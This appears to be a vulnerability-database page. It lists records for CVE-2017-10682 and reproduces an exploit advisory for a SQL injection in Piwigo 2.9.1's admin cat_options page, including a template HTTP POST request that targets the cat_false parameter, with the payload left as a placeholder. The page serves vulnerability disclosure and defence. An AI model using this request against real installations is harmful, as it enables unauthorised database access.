| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| Piwigo 2.9.1 - cat_true / cat_false SQL Injection Vulnerability | 14 Dec 201700:00 | – | zdt | |
| Piwigo SQL Injection Vulnerability | 3 Jul 201700:00 | – | cnvd | |
| CVE-2017-10682 | 29 Jun 201721:00 | – | cve | |
| CVE-2017-10682 | 29 Jun 201721:00 | – | cvelist | |
| Piwigo 2.9.1 - 'cat_true' / 'cat_false' SQL Injection | 14 Dec 201700:00 | – | exploitdb | |
| EUVD-2017-2329 | 7 Oct 202500:30 | – | euvd | |
| Piwigo 2.9.1 - cat_true cat_false SQL Injection | 14 Dec 201700:00 | – | exploitpack | |
| CVE-2017-10682 | 29 Jun 201721:29 | – | nvd | |
| Piwigo Multiple Vulnerabilities | 5 Jul 201700:00 | – | openvas | |
| Sql injection | 29 Jun 201721:29 | – | prion |
`# # # # #
# Exploit Title: Piwigo <= 2.9.1 - 'cat_true'/'cat_false' SQL Injection
# Dork: N/A
# Date: 12.12.2017
# Vendor Homepage: http://piwigo.org/
# Software Link: http://piwigo.org/basics/downloads
# Version: <= 2.9.1
# Category: Webapps
# Tested on: WiN7_x64/WIN10_X64
# CVE: CVE-2017-10682
# # # # #
# Exploit Author: Akityo
# Email: [email protected]
# # # # #
# Description:
#
# SQL injection vulnerability in the administrative backend in Piwigo through 2.9.1 allows remote users to execute arbitrary SQL commands via the cat_false or cat_true parameter
# in the comments or status page to cat_options.php.
#
#
# # # # #
# Proof-of-Concent:
#
# POST /[path]/admin.php?page=cat_options§ion=status HTTP/1.1
# Host: www.test.com
# Content-Length: 34
# Cache-Control: max-age=0
# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
# Upgrade-Insecure-Requests: 1
# User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
# Content-Type: application/x-www-form-urlencoded
# Accept-Encoding: gzip, deflate
# Accept-Language: zh-CN,zh;q=0.8
# Cookie: null
# Connection: close
#
# cat_false%5B%5D=[payload here]&trueify=%C2%AB
#
#
# # # # #
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation